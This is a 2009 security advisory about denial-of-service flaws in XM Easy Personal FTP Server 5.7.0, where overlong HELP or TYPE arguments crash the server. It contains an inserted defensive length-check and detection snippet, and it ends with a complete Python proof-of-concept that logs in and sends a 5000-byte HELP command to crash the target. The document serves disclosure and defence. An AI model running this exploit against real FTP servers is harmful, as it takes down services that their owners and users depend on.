
XM Easy Personal FTP Server Multiple DoS vulnerabilities

Credits:
NeerajT of Nevis Labs
http://www.nevisnetworks.com/services.php?id=10 

Date of Discovery: 14-May-2009

Vendor: Dxmsoft
URL: http://www.dxm2008.com/ 

Affected:
XM Easy Personal FTP Server 5.7.0
Earlier versions may also be affected

Overview:
XM Easy Personal FTP Server is an easy-to-use FTP server application. Multiple denial-of-service vulnerabilities exist in XM Personal FTP Server that cause the application to crash when an overly long argument is sent to certain FTP commands after authentication.

Details:
The DoS vulnerability exists because the application fails to handle large parameter values sent to certain FTP commands such as HELP or TYPE. When a long value (> 4700 bytes) is passed as a parameter to one of these commands, the FTP server cannot process it and crashes. Note that this is a post-authentication vulnerability: a user must be logged in to trigger it. No registers are overwritten, so remote code execution may not be possible.
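The argument-length guard that the server appears to lack, plus a detector that flags oversized HELP/TYPE lines in captured control-channel traffic, as an added example that is not part of this advisory or of the vendor's product. The 4700-byte threshold is the advisory's figure; the command set, reply texts and the sample session are assumptions.

```python
MAX_ARG_BYTES = 4700                   # advisory: values above this crash 5.7.0
LONG_ARG_COMMANDS = {"HELP", "TYPE"}   # commands named in the advisory (assumed set)

def parse_ftp_command(line: bytes):
    """Split one control-connection line into (VERB, argument bytes).
    RFC 959 lines look like '<VERB>[ <arg>]\r\n'; the verb is case-insensitive.
    Returns (None, b'') for an empty line."""
    line = line.rstrip(b"\r\n")
    if not line:
        return None, b""
    verb, _, arg = line.partition(b" ")
    return verb.upper().decode("ascii", "replace"), arg

def check_command(line: bytes, max_arg: int = MAX_ARG_BYTES) -> str:
    """Server-side guard: return the FTP reply to send. An oversized argument is
    answered with 501 and never reaches the command handler; otherwise the command
    would be dispatched to its handler (200 stands in for that here)."""
    verb, arg = parse_ftp_command(line)
    if verb is None:
        return "500 Syntax error, command unrecognized."
    if len(arg) > max_arg:
        return "501 Syntax error in parameters or arguments."
    return "200 Command okay."

def find_oversized(lines, max_arg: int = MAX_ARG_BYTES, commands=LONG_ARG_COMMANDS):
    """Detection over captured control-channel lines: (index, verb, arg_len) for
    every line whose verb is in `commands` and whose argument exceeds max_arg."""
    hits = []
    for i, line in enumerate(lines):
        verb, arg = parse_ftp_command(line)
        if verb in commands and len(arg) > max_arg:
            hits.append((i, verb, len(arg)))
    return hits

# Constructed sample of a post-authentication session, mirroring the PoC payload.
SAMPLE_SESSION = [
    b"USER alice\r\n",
    b"PASS s3cret\r\n",
    b"TYPE I\r\n",
    b"HELP " + b"A" * 5000 + b"\r\n",
    b"QUIT\r\n",
]

if __name__ == "__main__":
    for idx, verb, n in find_oversized(SAMPLE_SESSION):
        print(f"line {idx}: {verb} with {n}-byte argument -> {check_command(SAMPLE_SESSION[idx])}")
```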

Severity:
High

Solution:
No patches available from vendor
No workaround is available at this time

Vendor Communication Timelines:
05.14.2009 - Vulnerability Discovered
05.15.2009 - Vendor Notified
05.20.2009 - No Response, Vendor Notified again
06.05.2009 - No Ack from Vendor, Public Disclosure

PoC: Python Exploit
-----------------------------------------------------
#!/usr/bin/python
#
# ::::::::::::::::::::::::::::::[neeraj(.)thakar(at)nevisnetworks(.)com]
#
# [-] What:....[ XM Easy Personal FTP Server 5.7.0 ].....
# [-] Where:...[ http://www.dxm2008.com ]................ 
# [-] When:....[ 14-May-2009 ]...........................
# [-] Who:.....[ NeerajT | neeraj(.)thakar(at)nevisnetworks(.)com ]....
# [-] How:.....[
# A Denial of service vulnerability exists in XM
# Personal FTP Server that causes the application to
# crash when a long list of arguments is sent to
# certain FTP commands post authentication..........]
# [-] Thankz:..[ Jambalaya, Xin and Chintan ]............

import sys
from ftplib import FTP, all_errors

def usage():
    print("[...XM Personal FTP Server 5.7.0 DoS Exploit...]")
    print("[.........neeraj(.)thakar(at)gmail(.)com..............]\n")
    print("Usage: ./XMPersonal_FTPServer_DoSPoC.py <ftpserver> <user> <password>\n")
    print("\n Use it at your own risk ! This is just a PoC. I am not responsible for damages done by your crazy thinking.. :P\n")

# The Main function starts here.. (Python 3 syntax; behaviour as in the original PoC)
if __name__ == "__main__":
    ftpport = 21

    # get the args.. (three are required: server, user, password)
    if len(sys.argv) < 4:
        usage()
        sys.exit(1)
    ftpserver = sys.argv[1]
    user = sys.argv[2]
    passwd = sys.argv[3]

    print("Connecting to " + ftpserver + " using " + user + "....", end="")

    # Try opening a connection to the FTP server. The timeout has to be passed to
    # connect(); assigning F.timeout after the socket exists does not apply it.
    try:
        F = FTP()
        F.connect(ftpserver, ftpport, timeout=3)
        print("Connected !")
    except all_errors:
        print("\nCould not connect to the Server :(\n")
        sys.exit(1)

    # Lets create the Buffer.. (advisory: anything over ~4700 bytes is enough)
    crap = "A" * 5000

    # Creat'in da'bomb
    dabomb = "HELP " + crap

    print("Press any key to login..")
    ch = sys.stdin.read(1)

    # Lets login
    try:
        F.login(user, passwd)
    except all_errors:
        print("Oops.. Looks like you forgot to create a login !!\n")
        F.quit()
        sys.exit(1)
    print("Target Locked, Press any key to fire..", end="")
    ch = sys.stdin.read(1)

    print("Sendin Da'Bomb..")
    try:
        F.sendcmd(dabomb)
    except all_errors:
        # the server dropping the control connection (or timing out) is the crash signature
        print("Target destroyed !! Mission successfull..!")

    print("Returning to base..")
    F.close()
    sys.exit(0)
-----------------------------------------------------
